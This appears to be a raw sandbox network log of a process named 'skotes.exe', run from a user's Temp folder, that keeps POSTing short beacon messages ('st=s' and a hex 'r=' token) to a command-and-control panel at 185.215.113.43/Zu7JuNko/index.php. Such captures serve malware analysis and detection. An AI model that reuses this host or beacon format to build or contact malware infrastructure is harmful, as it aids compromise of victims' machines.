88	192.168.2.5	50331	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:06.862221003 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:07.757494926 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50332	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:09.282461882 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:10.200942039 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50333	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:11.821643114 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:12.719047070 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50334	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:14.235153913 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:15.144413948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50335	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:16.772834063 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:17.706702948 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50336	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:19.220515966 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:20.159665108 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50337	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:21.803061962 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:22.732795954 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50338	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:24.258162975 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:25.174117088 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50339	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:26.810996056 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:27.718259096 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50340	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:29.235016108 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:30.157944918 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50341	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:31.783262014 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:32.713627100 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50342	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:34.235152006 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:35.151290894 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50343	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:36.768754005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:37.677928925 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50344	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:39.188427925 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:40.085254908 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50348	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:41.714937925 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:42.623661995 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50349	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:44.149548054 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:45.044143915 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50351	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:46.679066896 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:47.594372034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50352	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:49.112658024 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:50.026700020 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50353	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:51.643419027 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:52.555428028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50354	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:54.080267906 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:54.985881090 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50355	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:56.627002001 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:57.522979975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50356	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:59.048737049 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50359	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:00.985373974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:01.906078100 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50360	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:03.428102970 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
